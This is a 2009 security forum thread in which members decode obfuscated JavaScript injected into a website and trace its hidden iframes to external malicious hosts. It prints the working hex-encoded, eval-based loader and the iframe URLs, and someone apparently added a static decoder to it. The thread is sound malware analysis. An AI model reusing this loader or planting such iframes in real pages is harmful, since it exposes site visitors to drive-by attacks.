
Decode Urgent Help Needed

<<

Dark_Knight

Sr. Member

Posts: 294

Joined: Mon Aug 11, 2008 7:03 pm

Post Fri Jul 24, 2009 5:54 pm

Decode Urgent Help Needed

I need some help here. Anybody have an idea what this does?
336425333425333725333025323025373325373425373925366325363525336425323725373625363925373325 3639253632253639253663253639253734253739253361'+c26z3d+'25363825363925363425363425 3635253665253237253365253363253266253639253636253732253631'+c26z3d+'25366425363525 33652729293B7D7661'+c26z3d+'72206D796961'+c26z3d+'3D747275653B3C2F736372 6970743E';r5bb5e1df0.write(r3a5450e3d81(reeaa475ea65));

How could I decode this?
CEH, OSCP, GPEN, GWAPT, GCIA
http://sector876.blogspot.com
<<

alan

Newbie

Posts: 48

Joined: Sat Dec 27, 2008 11:55 pm

Post Fri Jul 24, 2009 6:27 pm

Re: Decode Urgent Help Needed

how far have you gotten?

putting this portion into

3D747275653B3C2F7363726970743E

hex 2 ascii gives

=true;</script>

which looks reasonable! but i get stuck there!
<<

Dark_Knight

Sr. Member

Posts: 294

Joined: Mon Aug 11, 2008 7:03 pm

Post Fri Jul 24, 2009 6:29 pm

Re: Decode Urgent Help Needed

I initially tried the hex to ASCII but had no luck. I will give it another shot.
CEH, OSCP, GPEN, GWAPT, GCIA
http://sector876.blogspot.com
<<

alan

Newbie

Posts: 48

Joined: Sat Dec 27, 2008 11:55 pm

Post Fri Jul 24, 2009 6:57 pm

Re: Decode Urgent Help Needed

I think you could be missing a good portion of it. I've sent you a private message which may or may not be relevant.
<<

Jhaddix

Sr. Member

Posts: 317

Joined: Wed Oct 29, 2008 10:25 pm

Post Fri Jul 24, 2009 6:58 pm

Re: Decode Urgent Help Needed

By first impressions I'd say it's an XSS attack... a full decode would be required.
<<

Dark_Knight

Sr. Member

Posts: 294

Joined: Mon Aug 11, 2008 7:03 pm

Post Fri Jul 24, 2009 7:01 pm

Re: Decode Urgent Help Needed

Thanks for all the help guys. I appreciate it.
CEH, OSCP, GPEN, GWAPT, GCIA
http://sector876.blogspot.com
<<

Ketchup

Hero Member

Posts: 1021

Joined: Fri Jul 04, 2008 7:44 pm

Location: Philadelphia, PA

Post Fri Jul 24, 2009 7:59 pm

Re: Decode Urgent Help Needed

The rough translation is this:

  Code:
style='visibility:hidden'></iframe>'));}var myia=true;</script> r5bb5e1df0.write(r3a5450e3d81(reeaa475ea65));


You are indeed missing a good portion of it.  I would agree with Jhaddix in that it is likely part of an XSS attack.
~~~~~~~~~~~~~~
Ketchup
<<

UNIX

Hero Member

Posts: 1244

Joined: Mon Apr 28, 2008 9:20 am

Post Fri Jul 24, 2009 11:58 pm

Re: Decode Urgent Help Needed

I too would say that a part is missing. Do you have the rest of it, or were you just asking to get an idea what this could be?
<<

Jhaddix

Sr. Member

Posts: 317

Joined: Wed Oct 29, 2008 10:25 pm

Post Sat Jul 25, 2009 1:31 am

Re: Decode Urgent Help Needed

Ketchup's decode makes me think it's a clickjacking attack, injected via XSS.
<<

Dark_Knight

Sr. Member

Posts: 294

Joined: Mon Aug 11, 2008 7:03 pm

Post Sat Jul 25, 2009 9:27 am

Re: Decode Urgent Help Needed

  Code:
<script>c26z634='';r28bd46b6=document;r28bd46b6.write('<scr'+'ipt>function r4373bbe(r52973acb7a){return ev'+c26z634+'al(r52973acb7a); }</scr'+'ipt>');  function c26e34eb22refb13(re3c3827f47){ function r8157f3fa362(){var r99011=16;return r99011;} var zf4='';return (r4373bbe('parseI'+zf4+'nt')(re3c3827f47,r8157f3fa362()));}function r3cf3d(rcba5aab2){ function r2554044(){var rc0ee24fd3=2;return rc0ee24fd3;} var r3ff7d7403c7='';r17e8d5766='fromCh';r26431=String[r17e8d5766+'arCode'];for(r7bb6b022=0;r7bb6b022<rcba5aab2.length;r7bb6b022+=r2554044()){ r3ff7d7403c7+=(r26431(c26e34eb22refb13(rcba5aab2.substr(r7bb6b022,r2554044()))));}return r3ff7d7403c7;} var r6671d26afb='3C7363726970743E69662821'+c26z634+'6D796961'+c26z634+'297B646F63756D656E742E777269746528756E65736361'+c26z634+'7065282027253363253639253636253732253631'+c26z634+'253664253635253230253665253631'+c26z634+'253664253635253364253633253332253336253230253733253732253633253364253237253638253734253734253730253361'+c26z634+'253266253266253737253737253737253265253631'+c26z634+'253732253665253638253635253664253264253634253639253631'+c26z634+'253664253631'+c26z634+'253665253734253265253665253663253266253366253237253262253464253631'+c26z634+'253734253638253265253732253666253735253665253634253238253464253631'+c26z634+'253734253638253265253732253631'+c26z634+'253665253634253666253664253238253239253261'+c26z634+'253331'+c26z634+'253330253339253339253330253338253239253262253237253330253635253339253332253335253632253237253230253737253639253634253734253638253364253336253333253339253230253638253635253639253637253638253734253364253331'+c26z634+'253337253332253230253733253734253739253663253635253364253237253736253639253733253639253632253639253663253639253734253739253361'+c26z634+'253638253639253634253634253635253665253237253365253363253266253639253636253732253631'+c26z634+'2536642536352533652729293B7D7661'+c26z634+'72206D796961'+c26z634+'3D747275653B3C2F7363726970743E';r28bd46b6.write(r3cf3d(r6671d26afb));</script><script>check_content()</script>

<script>if(!myia){document.write(unescape
<iframe name=c26 src='hxxp://www.arnhem-diamant.nl/?'+Math.round(Math.random()*109908)+'0e925b' width=639 height=1 c72 style='visibility:hidden'></iframe>      
=true;</script>
));}va

That's what I have so far. Apparently they go from hex to ASCII and then ASCII to binary.
CEH, OSCP, GPEN, GWAPT, GCIA
http://sector876.blogspot.com
<<

Ketchup

Hero Member

Posts: 1021

Joined: Fri Jul 04, 2008 7:44 pm

Location: Philadelphia, PA

Post Sat Jul 25, 2009 10:17 am

Re: Decode Urgent Help Needed

Well, they are obscuring the code a bit.  It's pretty common for goofy variable and function names to be used, like r58ss8a2, for example.  I cleaned up the code a little bit.  It looks like you are still missing some portion of it, although I doubt it is necessary.  The attack vector looks like a hidden IFRAME.

  Code:
<script>

spacer='';
doc=document;
doc.write('<scr'+'ipt>function unknown_function1(unknown_var1){return ev'+spacer+'al(unknown_var1); }</scr'+'ipt>');


function function1(func1_arg1)
{

  function setvar1()
  {
    var var1=16;
    return var1;
  }
  var spacer2='';
  return (unknown_function1('parseI'+spacer2+'nt')(func1_arg1,setvar1()));
}

function function2(func2_arg1)
{
  function setvar2()
  {
    var var2=2;
    return var2;
  }
  var return_string='';
  string1='fromCh';
  string2=String[string1+'arCode'];
  for(i=0;i<func2_arg1.length;i+=setvar2())
  {
    return_string+=(string2(function1(func2_arg1.substr(i,setvar2()))));
  }
  return return_string;
}

var attack_vector='3C7363726970743E69662821' +spacer+ '6D796961' +spacer+ '297B646F63756D656E742E777269746528756E65736361' +spacer+ '7065282027253363253639253636253732253631' +spacer+ '253664253635253230253665253631' +spacer+ '253664253635253364253633253332253336253230253733253732253633253364253237253638253734253734253730253361' +spacer+ '253266253266253737253737253737253265253631' +spacer+ '253732253665253638253635253664253264253634253639253631' +spacer+ '253664253631' +spacer+ '253665253734253265253665253663253266253366253237253262253464253631' +spacer+ '253734253638253265253732253666253735253665253634253238253464253631' +spacer+ '253734253638253265253732253631' +spacer+ '253665253634253666253664253238253239253261' +spacer+ '253331' +spacer+ '253330253339253339253330253338253239253262253237253330253635253339253332253335253632253237253230253737253639253634253734253638253364253336253333253339253230253638253635253639253637253638253734253364253331' +spacer+ '253337253332253230253733253734253739253663253635253364253237253736253639253733253639253632253639253663253639253734253739253361' +spacer+ '253638253639253634253634253635253665253237253365253363253266253639253636253732253631' +spacer+ '2536642536352533652729293B7D7661' +spacer+ '72206D796961' +spacer+ '3D747275653B3C2F7363726970743E';

<!-- ***** The above attack_vector variable translates to the following: ***** -->
<!-- ***** This was added by ketchup ***** -->
<script>
if(!myia)
{
  document.write(unescape( "'<iframe name=c26 src='http://www.arnhem-diamant.nl/?'+Math.round(Math.random()*109908)+'0e925b' width=639 height=172 style='visibility:hidden'></iframe>'"));
}
var myia=true;
</script>
<!-- ***** end translation of attack_vector variable ***** -->



<!-- ********* here is where it appears they write the attack vector *********** -->
document.write(function2(attack_vector));

</script>

<script>
  check_content()
</script>
~~~~~~~~~~~~~~
Ketchup
<<

Dark_Knight

Sr. Member

Posts: 294

Joined: Mon Aug 11, 2008 7:03 pm

Post Sat Jul 25, 2009 10:22 am

Re: Decode Urgent Help Needed

Guys, the help is GREATLY appreciated. So this looks like an XSS attack, maybe, as mentioned previously?
CEH, OSCP, GPEN, GWAPT, GCIA
http://sector876.blogspot.com
<<

Ketchup

Hero Member

Posts: 1021

Joined: Fri Jul 04, 2008 7:44 pm

Location: Philadelphia, PA

Post Sat Jul 25, 2009 10:35 am

Re: Decode Urgent Help Needed

Yep, I am not sure exactly what that link is doing, but I am not brave enough to find out :)
~~~~~~~~~~~~~~
Ketchup
<<

Ketchup

Hero Member

Posts: 1021

Joined: Fri Jul 04, 2008 7:44 pm

Location: Philadelphia, PA

Post Sat Jul 25, 2009 11:15 am

Re: Decode Urgent Help Needed

Here is what I pulled from the site referenced in the script.  I took the liberty of translating some of the code to make it more readable. 

This is interesting.  I will let you know if I find anything else.

  Code:
<!-- ad -->
<script type="text/javascript">
var filler1 = "lRusrktXDJJYrvSgerej";
var filler2 = "OsFFoXlSOQCXadLJskRb";
var filler3 = "jEfJhqTablBNAwUHCnrO";

// renamed from "shellcode?", which is not a legal identifier; the later post notes it is just another iframe
var maybe_shellcode = "z60z105z102z114z97z109z101z32z119z105z100z116z104z61z34z52z56z48z34z32z104z101z105z103z104z116z61z34z54z48z34z32z115z114z99z61z34z104z116z116z112z58z47z47z119z119z119z46z103z97z114z100z101z110z45z97z114z116z46z103z114z47z34z32z115z116z121z108z101z61z34z98z111z114z100z101z114z58z48z112z120z59z32z112z111z115z105z116z105z111z110z58z114z101z108z97z116z105z118z101z59z32z116z111z112z58z48z112z120z59z32z108z101z102z116z58z45z53z48z48z112z120z59z32z111z112z97z99z105z116z121z58z48z59z32z102z105z108z116z101z114z58z112z114z111z103z105z100z58z68z88z73z109z97z103z101z84z114z97z110z115z102z111z114z109z46z77z105z99z114z111z115z111z102z116z46z65z108z112z104z97z40z111z112z97z99z105z116z121z61z48z41z59z32z45z109z111z122z45z111z112z97z99z105z116z121z58z48z34z62z60z47z105z102z114z97z109z101z62";

var filler4 = "mgpmcKufxlumukVYGnvu";
var filler5 = "FyzziVYoJTjQuBufAdRA";
var filler6 = "cUHXVBCVfUWXBJKmVWmB";

// split on the "z" separator; element 0 is empty because the string starts with "z"
var array_var1 = maybe_shellcode.split("z");

var filler7 = "EMwGVHsrdesOdfMoCHhk";
var filler8 = "sQVVvhKypribJcOSEVUP";
var filler9 = "gaVqDjIHFcWYXCCoEMiV";

var string_var1 = "";

var filler10 = "GmndopStCBOxlsqrCdDA";
var filler11 = "jWjVPaMREQRNXxbGzyyf";
var filler12 = "zAvXyXdyVbdHfvSeerMv";

for (var i=1; i<array_var1.length; i++)
{
  string_var1+=String.fromCharCode(array_var1[i]);
}
try
{
  document.write(string_var1);
}
catch(e)
{
}

var filler13 = "cEtIzLmeDzZbgWDQoxfq";
var filler14 = "nQFUmJkbGQRhsImNXTyo";
var filler15 = "fosYxelUyjIaDpPnYRyu";

</script>
<!-- /ad -->
</body></html>
   
<script>check_content()</script>
~~~~~~~~~~~~~~
Ketchup
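A static decoder for the encoding layers Ketchup walks through in the two posts above, added here as an example and not code from the thread: it strips the '+c26z634+' splices, decodes the hex pairs, pulls the unescape() argument out and percent-decodes it, and separately handles the "z"-separated decimal codes used by the second site's script, all without evaluating anything. The embedded hex string is the thread's own first-layer sample; the z-coded string is a short constructed one.

```javascript
// Added example: a static decoder for the layers seen in this thread. Nothing here
// evaluates the sample; it only reveals what the script would document.write().

// Layer 1: strip the '+c26z634+' splices, keep hex digits, decode two chars at a time
// (the same thing the script does with String.fromCharCode(parseInt(pair, 16))).
function decodeHexPairs(obfuscated) {
  const hex = obfuscated.replace(/'\s*\+\s*\w+\s*\+\s*'/g, '').replace(/[^0-9a-fA-F]/g, '');
  let out = '';
  for (let i = 0; i + 1 < hex.length; i += 2) {
    out += String.fromCharCode(parseInt(hex.slice(i, i + 2), 16));
  }
  return out;
}
// Layer 2: decode %XX escapes the way unescape() would, without handing the payload to the runtime.
function decodePercent(s) {
  return s.replace(/%([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}
// The second site's scheme: "z"-separated decimal char codes (leading empty field dropped).
function decodeZCodes(s) {
  return s.split('z').filter(Boolean).map((n) => String.fromCharCode(Number(n))).join('');
}

// Pull each unescape('...') argument out of a decoded script.
function extractUnescapeArgs(script) {
  const re = /unescape\(\s*(['"])(.*?)\1\s*\)/g;
  const args = [];
  let m;
  while ((m = re.exec(script)) !== null) args.push(m[2]);
  return args;
}

// Full pipeline: hex layer -> unescape() payloads -> percent-decoded markup.
function decodeSample(obfuscated) {
  const layer1 = decodeHexPairs(obfuscated);
  return { layer1, payloads: extractUnescapeArgs(layer1).map(decodePercent) };
}

// The thread's first-layer string, kept with its splices exactly as pasted.
const SAMPLE_HEX =
  "3C7363726970743E69662821'+c26z634+'6D796961'+c26z634+'297B646F63756D656E742E777269746528756E65736361'+c26z634+'7065282027253363253639253636253732253631'+c26z634+'" +
  "253664253635253230253665253631'+c26z634+'253664253635253364253633253332253336253230253733253732253633253364253237253638253734253734253730253361'+c26z634+'" +
  "253266253266253737253737253737253265253631'+c26z634+'253732253665253638253635253664253264253634253639253631'+c26z634+'253664253631'+c26z634+'" +
  "253665253734253265253665253663253266253366253237253262253464253631'+c26z634+'253734253638253265253732253666253735253665253634253238253464253631'+c26z634+'253734253638253265253732253631'+c26z634+'" +
  "253665253634253666253664253238253239253261'+c26z634+'253331'+c26z634+'253330253339253339253330253338253239253262253237253330253635253339253332253335253632253237253230253737253639253634253734253638253364253336253333253339253230253638253635253639253637253638253734253364253331'+c26z634+'" +
  "253337253332253230253733253734253739253663253635253364253237253736253639253733253639253632253639253663253639253734253739253361'+c26z634+'253638253639253634253634253635253665253237253365253363253266253639253636253732253631'+c26z634+'2536642536352533652729293B7D7661'+c26z634+'72206D796961'+c26z634+'3D747275653B3C2F7363726970743E";

// Constructed z-coded input in the second site's format; decodes to "<iframe>".
const SAMPLE_Z = 'z60z105z102z114z97z109z101z62';

console.log(decodeSample(SAMPLE_HEX).payloads[0]);
console.log(decodeZCodes(SAMPLE_Z));
```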
<<

Ketchup

Hero Member

Posts: 1021

Joined: Fri Jul 04, 2008 7:44 pm

Location: Philadelphia, PA

Post Sat Jul 25, 2009 11:33 am

Re: Decode Urgent Help Needed

LOL, that's not shellcode.  I was over-analyzing it.   It's just another iframe:

  Code:
<iframe width="480" height="60" src="http://www.garden-art.gr/" style="border:0px; position:relative; top:0px; left:-500px; opacity:0; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0); -moz-opacity:0"></iframe>


I traced it through a couple of more sites, and I am stuck here:

  Code:
<iframe width="480" height="60" src="http://ddosguard.info/vsetakoe/?96d440414dfad88fe5c6de195a254e50" style="border:0px; position:relative; top:0px; left:-500px; opacity:0; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0); -moz-opacity:0"></iframe>


The hash value being passed to that URL seems to be some sort of authentication hash (md5).  I am guessing this one is either not valid or is disabled because I am not getting anything from this page.  If you alter the parameter or delete it, you get plain text on the page that resembles BASE64 encoding.  The BASE64 text varies depending on how you alter the parameter.  It doesn't appear to translate to anything readable, at least not in English.
Last edited by Ketchup on Sat Jul 25, 2009 12:12 pm, edited 1 time in total.
~~~~~~~~~~~~~~
Ketchup